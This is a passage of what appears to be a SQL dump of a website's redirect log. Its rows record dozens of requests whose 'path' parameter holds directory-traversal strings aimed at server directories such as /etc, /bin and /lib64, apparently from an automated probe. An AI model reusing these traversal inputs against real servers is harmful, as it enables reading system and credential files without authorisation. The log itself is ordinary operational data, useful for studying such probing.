00:00:00',301),(79851,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/apache2/../python3.6/../python3.12/traceback.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fapache2%2F..%2Fpython3.6%2F..%2Fpython3.12%2Ftraceback.py','',1,0,'2026-06-24 18:41:23','0000-00-00 00:00:00',301),(79852,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/re.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fre.pyo','',1,0,'2026-06-24 18:41:23','0000-00-00 00:00:00',301),(79853,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../gssproxy/../python2.7/compiler/../stringold.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Fgssproxy%2F..%2Fpython2.7%2Fcompiler%2F..%2Fstringold.pyc','',1,0,'2026-06-24 18:41:24','0000-00-00 00:00:00',301),(79854,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/../python3.6/encodings',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2Fpython3.6%2Fencodings','',1,0,'2026-06-24 18:41:25','0000-00-00 00:00:00',301),(79855,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../.cl.selector/../../../sbin/../include/python2.7/opcode.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.cl.selector%2F..%2F..%2F..%2Fsbin%2F..%2Finclude%2Fpython2.7%2Fopcode.h','',1,0,'2026-06-24 18:41:26','0000-00-00 00:00:00',301),(79856,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../bind/../python3.6/importlib',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fbind%2F..%2Fpython3.6%2Fimportlib','',1,0,'2026-06-24 18:41:28','0000-00-00 00:00:00',301),(79857,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/apache2/../python3.6/../python3.12/_weakrefset.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fapache2%2F..%2Fpython3.6%2F..%2Fpython3.12%2F_weakrefset.py','',1,0,'2026-06-24 18:41:28','0000-00-00 00:00:00',301),(79858,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/../python3.12/sunau.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fsunau.py','',1,0,'2026-06-24 18:41:29','0000-00-00 00:00:00',301),(79859,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/asyncio/../../libbasicobjects.so.0.1.0',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fasyncio%2F..%2F..%2Flibbasicobjects.so.0.1.0','',1,0,'2026-06-24 18:41:31','0000-00-00 00:00:00',301),(79860,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/firebird/../networkmanager/../python2.7/../pm-utils',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffirebird%2F..%2FNetworkManager%2F..%2Fpython2.7%2F..%2Fpm-utils','',1,0,'2026-06-24 18:41:31','0000-00-00 00:00:00',301),(79861,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/.././../../lib64/python2.7/../../tmp',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.%2F..%2F..%2Flib64%2Fpython2.7%2F..%2F..%2Ftmp','',1,0,'2026-06-24 18:41:32','0000-00-00 00:00:00',301),(79862,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/popen2.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fpopen2.py','',1,0,'2026-06-24 18:41:33','0000-00-00 00:00:00',301),(79863,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/man/../../include/python3.6m/enumobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fman%2F..%2F..%2Finclude%2Fpython3.6m%2Fenumobject.h','',1,0,'2026-06-24 18:41:34','0000-00-00 00:00:00',301),(79864,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/htmlentitydefs.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fhtmlentitydefs.pyo','',1,0,'2026-06-24 18:41:36','0000-00-00 00:00:00',301),(79865,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python2.7/../regex.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython2.7%2F..%2Fregex.h','',1,0,'2026-06-24 18:41:36','0000-00-00 00:00:00',301),(79866,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python2.7/../lve',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython2.7%2F..%2Flve','',1,0,'2026-06-24 18:41:37','0000-00-00 00:00:00',301),(79867,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/xml/../cgitb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fxml%2F..%2Fcgitb.py','',1,0,'2026-06-24 18:41:38','0000-00-00 00:00:00',301),(79868,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../python2.7/../pkgconfig',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython2.7%2F..%2Fpkgconfig','',1,0,'2026-06-24 18:41:39','0000-00-00 00:00:00',301),(79869,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../led-bazaar.net/../../../../lib64/python2.7/../python3.12/stat.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fled-bazaar.net%2F..%2F..%2F..%2F..%2Flib64%2Fpython2.7%2F..%2Fpython3.12%2Fstat.py','',1,0,'2026-06-24 18:41:40','0000-00-00 00:00:00',301),(79870,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../public_ftp/../.wp-cli/../ocartdata2/../../../../bin/python3',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fpublic_ftp%2F..%2F.wp-cli%2F..%2Focartdata2%2F..%2F..%2F..%2F..%2Fbin%2Fpython3','',1,0,'2026-06-24 18:41:42','0000-00-00 00:00:00',301),(79871,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../mysql/../python3.12/pathlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fmysql%2F..%2Fpython3.12%2Fpathlib.py','',1,0,'2026-06-24 18:41:43','0000-00-00 00:00:00',301),(79872,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python2.7/sqlite3/../string.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython2.7%2Fsqlite3%2F..%2Fstring.pyc','',1,0,'2026-06-24 18:41:44','0000-00-00 00:00:00',301),(79873,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/abc.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Fabc.py','',1,0,'2026-06-24 18:41:45','0000-00-00 00:00:00',301),(79874,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python2.7/../execinfo.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython2.7%2F..%2Fexecinfo.h','',1,0,'2026-06-24 18:41:46','0000-00-00 00:00:00',301),(79875,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/sre.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fsre.py','',1,0,'2026-06-24 18:41:47','0000-00-00 00:00:00',301),(79876,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/pickle.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fpickle.py','',1,0,'2026-06-24 18:41:48','0000-00-00 00:00:00',301),(79877,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/python3.6/pydoc_data/../xml/../../libpython3.6m.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fpython3.6%2Fpydoc_data%2F..%2Fxml%2F..%2F..%2Flibpython3.6m.so','',1,0,'2026-06-24 18:41:49','0000-00-00 00:00:00',301),(79878,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../python2.7/../python3.6/heapq.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2Fpython3.6%2Fheapq.py','',1,0,'2026-06-24 18:41:50','0000-00-00 00:00:00',301),(79879,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../pkgconfig/../python2.7/stringprep.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fstringprep.pyo','',1,0,'2026-06-24 18:41:51','0000-00-00 00:00:00',301),(79880,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/robotparser.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Frobotparser.pyo','',1,0,'2026-06-24 18:41:52','0000-00-00 00:00:00',301),(79881,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python2.7/../python3.6/_dummy_thread.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython2.7%2F..%2Fpython3.6%2F_dummy_thread.py','',1,0,'2026-06-24 18:41:53','0000-00-00 00:00:00',301),(79882,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../python2.7/../python3.12/lib-dynload',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython2.7%2F..%2Fpython3.12%2Flib-dynload','',1,0,'2026-06-24 18:41:54','0000-00-00 00:00:00',301),(79883,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/git-core/../git-core/../adobe/../vim',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fgit-core%2F..%2Fgit-core%2F..%2Fadobe%2F..%2Fvim','',1,0,'2026-06-24 18:41:55','0000-00-00 00:00:00',301),(79884,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/src/../src/../include/execinfo.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fsrc%2F..%2Fsrc%2F..%2Finclude%2Fexecinfo.h','',1,0,'2026-06-24 18:41:56','0000-00-00 00:00:00',301),(79885,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../gssproxy/../python2.7/xml/../opcode.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Fgssproxy%2F..%2Fpython2.7%2Fxml%2F..%2Fopcode.pyc','',1,0,'2026-06-24 18:41:57','0000-00-00 00:00:00',301),(79886,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../python2.7/abc.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpython2.7%2Fabc.pyc','',1,0,'2026-06-24 18:41:58','0000-00-00 00:00:00',301),(79887,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../fipscheck/../python3.6/../python3.6/nturl2path.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Ffipscheck%2F..%2Fpython3.6%2F..%2Fpython3.6%2Fnturl2path.py','',1,0,'2026-06-24 18:41:59','0000-00-00 00:00:00',301),(79888,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/zipfile.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fzipfile.pyc','',1,0,'2026-06-24 18:42:00','0000-00-00 00:00:00',301),(79889,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/sqlite3/../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2F.','',1,0,'2026-06-24 18:42:01','0000-00-00 00:00:00',301),(79890,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/filecmp.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Ffilecmp.py','',1,0,'2026-06-24 18:42:02','0000-00-00 00:00:00',301),(79891,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python3.6/importlib/../../samba',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython3.6%2Fimportlib%2F..%2F..%2Fsamba','',1,0,'2026-06-24 18:42:05','0000-00-00 00:00:00',301),(79892,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python2.7/distutils',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython2.7%2Fdistutils','',1,0,'2026-06-24 18:42:05','0000-00-00 00:00:00',301),(79893,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../php/docs/../tests/../../etc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fphp%2Fdocs%2F..%2Ftests%2F..%2F..%2Fetc','',1,0,'2026-06-24 18:42:06','0000-00-00 00:00:00',301),(79894,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../dovecot/../python3.12/sqlite3/../../python3.6/tabnanny.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fdovecot%2F..%2Fpython3.12%2Fsqlite3%2F..%2F..%2Fpython3.6%2Ftabnanny.py','',1,0,'2026-06-24 18:42:06','0000-00-00 00:00:00',301),(79895,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python3.12/csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython3.12%2Fcsv.py','',1,0,'2026-06-24 18:42:07','0000-00-00 00:00:00',301),(79896,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/enchant/../lua/../python2.7/../xtables',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fenchant%2F..%2Flua%2F..%2Fpython2.7%2F..%2Fxtables','',1,0,'2026-06-24 18:42:07','0000-00-00 00:00:00',301),(79897,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/device-mapper/../php/../python3.12/xml/../../python3.6/base64.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fdevice-mapper%2F..%2Fphp%2F..%2Fpython3.12%2Fxml%2F..%2F..%2Fpython3.6%2Fbase64.py','',1,0,'2026-06-24 18:42:07','0000-00-00 00:00:00',301),(79898,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/new.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fnew.py','',1,0,'2026-06-24 18:42:09','0000-00-00 00:00:00',301),(79899,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/sqlite3/../tempfile.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2Ftempfile.py','',1,0,'2026-06-24 18:42:10','0000-00-00 00:00:00',301),(79900,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/pydoc_data',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fpydoc_data','',1,0,'2026-06-24 18:42:11','0000-00-00 00:00:00',301),(79901,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../php/data/../.filemap',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2Fphp%2Fdata%2F..%2F.filemap','',1,0,'2026-06-24 18:42:12','0000-00-00 00:00:00',301),(79902,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../enchant/../python2.7/../python3.12/tty.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fenchant%2F..%2Fpython2.7%2F..%2Fpython3.12%2Ftty.py','',1,0,'2026-06-24 18:42:13','0000-00-00 00:00:00',301),(79903,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/commands.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fcommands.py','',1,0,'2026-06-24 18:42:16','0000-00-00 00:00:00',301),(79904,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/../tls',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2F..%2Ftls','',1,0,'2026-06-24 18:42:17','0000-00-00 00:00:00',301),(79905,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/plistlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fplistlib.py','',1,0,'2026-06-24 18:42:18','0000-00-00 00:00:00',301),(79906,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python2.7/moduleobject.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython2.7%2Fmoduleobject.h','',1,0,'2026-06-24 18:42:19','0000-00-00 00:00:00',301),(79907,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python2.7/../python3.6/pdb.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython2.7%2F..%2Fpython3.6%2Fpdb.py','',1,0,'2026-06-24 18:42:20','0000-00-00 00:00:00',301),(79908,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../gawk/../python3.6/html',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fgawk%2F..%2Fpython3.6%2Fhtml','',1,0,'2026-06-24 18:42:21','0000-00-00 00:00:00',301),(79909,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../python3.12/sqlite3/../unittest/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fpython3.12%2Fsqlite3%2F..%2Funittest%2F..','',1,0,'2026-06-24 18:42:22','0000-00-00 00:00:00',301),(79910,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/sqlite3/../_compression.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2Fsqlite3%2F..%2F_compression.py','',1,0,'2026-06-24 18:42:23','0000-00-00 00:00:00',301),(79911,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/.././python3.12/csv.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2F.%2Fpython3.12%2Fcsv.py','',1,0,'2026-06-24 18:42:24','0000-00-00 00:00:00',301),(79912,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/__future__.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2F__future__.pyc','',1,0,'2026-06-24 18:42:26','0000-00-00 00:00:00',301),(79913,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../krb5/../python3.12/../libpython3.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fkrb5%2F..%2Fpython3.12%2F..%2Flibpython3.so','',1,0,'2026-06-24 18:42:26','0000-00-00 00:00:00',301),(79914,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../python3.12/../gettext',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fpython3.12%2F..%2Fgettext','',1,0,'2026-06-24 18:42:27','0000-00-00 00:00:00',301),(79915,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/plistlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fplistlib.py','',1,0,'2026-06-24 18:42:27','0000-00-00 00:00:00',301),(79916,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../../../bin/env',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F..%2F..%2Fbin%2Fenv','',1,0,'2026-06-24 18:42:28','0000-00-00 00:00:00',301),(79917,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../gssproxy/../libproxy/../python3.12/../libtalloc.so.2',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2Fgssproxy%2F..%2Flibproxy%2F..%2Fpython3.12%2F..%2Flibtalloc.so.2','',1,0,'2026-06-24 18:42:29','0000-00-00 00:00:00',301),(79918,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../sa/../apache2/../python2.7/robotparser.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Fsa%2F..%2Fapache2%2F..%2Fpython2.7%2Frobotparser.py','',1,0,'2026-06-24 18:42:29','0000-00-00 00:00:00',301),(79919,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/encodings/../../python3.12/../python3.12/operator.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fencodings%2F..%2F..%2Fpython3.12%2F..%2Fpython3.12%2Foperator.py','',1,0,'2026-06-24 18:42:30','0000-00-00 00:00:00',301),(79920,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../security/../pkgconfig/../python2.7/decimal.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fsecurity%2F..%2Fpkgconfig%2F..%2Fpython2.7%2Fdecimal.pyc','',1,0,'2026-06-24 18:42:31','0000-00-00 00:00:00',301),(79921,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/firebird/../networkmanager/../python2.7/codeop.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffirebird%2F..%2FNetworkManager%2F..%2Fpython2.7%2Fcodeop.pyc','',1,0,'2026-06-24 18:42:32','0000-00-00 00:00:00',301),(79922,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/lib-tk',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Flib-tk','',1,0,'2026-06-24 18:42:33','0000-00-00 00:00:00',301),(79923,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.wp-cli/../../../../usr/include/python3.12/../grp.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.wp-cli%2F..%2F..%2F..%2F..%2Fusr%2Finclude%2Fpython3.12%2F..%2Fgrp.h','',1,0,'2026-06-24 18:42:34','0000-00-00 00:00:00',301),(79924,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/tools/../random.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2FTools%2F..%2Frandom.py','',1,0,'2026-06-24 18:42:35','0000-00-00 